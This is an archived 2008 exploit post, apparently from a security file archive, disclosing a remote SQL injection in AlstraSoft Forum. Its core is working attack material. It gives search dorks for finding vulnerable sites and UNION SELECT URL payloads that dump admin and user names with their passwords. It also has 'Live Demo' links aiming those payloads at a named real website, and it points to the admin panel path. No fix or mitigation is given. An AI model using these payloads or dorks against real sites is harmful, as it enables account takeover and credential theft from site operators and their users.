alstrasoftforum-sql.txt

alstrasoftforum-sql.txt: Posted Sep 8, 2008; Authored by r45c4l, P47r1ck | Site darkc0de.com; Alstrasoft Forum suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | a8216cfb540c40575702ab5e9a662f29c079c44a823c08afa0ae6367b82760a9; Download | Favorite | View

alstrasoftforum-sql.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
#  ---  QKrun1x  - skillfaker - FeDeReR - Optyx - Nuclear  
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l and P47r1ck 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
# 
# Share the c0de! 
# 
################################################################ 
# 
# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
#
#
# App Name:  AlstraSoft Forum 
# 
# App Home: http://www.alstrasoft.com/
# 
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
# 
# 
# 
# 
# 
# POC: For Admin id and pass
#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- 
# 
# P0C-2: For Users id and pass
#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
# 
# Live Demo: (For admin)
# 
# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
#  
# Live Demo: (For Users)
#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
#
#
# Admin panel is at http://site.com/admin 
################################################################ 
# Vuln Discovered 7th Sep 2008

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

alstrasoftforum-sql.txt

alstrasoftforum-sql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

alstrasoftforum-sql.txt

Share This

alstrasoftforum-sql.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems